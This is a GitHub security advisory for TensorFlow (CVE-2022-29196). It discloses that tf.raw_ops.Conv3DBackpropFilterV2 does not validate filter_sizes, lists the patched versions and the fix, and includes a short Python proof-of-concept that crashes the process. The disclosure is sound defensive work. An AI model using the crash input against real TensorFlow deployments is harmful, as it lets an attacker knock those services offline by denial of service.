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Missing validation causes denial of service via `Conv3DBackpropFilterV2`

mihaimaruseac published GHSA-5v77-j66x-4c4g on May 17

Package

tensorflow, tensorflow-cpu, tensorflow-gpu (pip)

Affected versions

Patched versions

< 2.9.0

2.6.4, 2.7.2, 2.8.1, 2.9.0

Description

Impact

The implementation of tf.raw_ops.Conv3DBackpropFilterV2 does not fully validate the input arguments. This results in a CHECK -failure which can be used to trigger a denial of service attack:

```
import tensorflow as tf
tf.raw_ops.Conv3DBackpropFilterV2(
  input=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  filter_sizes=tf.constant(0, shape=[], dtype=tf.int32),
  out_backprop=tf.constant(.5053710941, shape=[2,2,2,2,1], dtype=tf.float16),
  strides=[1, 1, 1, 1, 1],
  padding="VALID",
  data_format="NDHWC",
  dilations=[1, 1, 1, 1, 1])
```

The code does not validate that the filter_sizes argument is a vector.

Patches

We have patched the issue in GitHub commit 174c5096f303d5be7ed2ca2662b08371bff4ab88.

The fix will be included in TensorFlow 2.9.0. We will also cherrypick this commit on TensorFlow 2.8.1, TensorFlow 2.7.2, and TensorFlow 2.6.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou from Secure Systems Lab at Brown University.

Severity



CVE ID

CVE-2022-29196

Weaknesses

No CWEs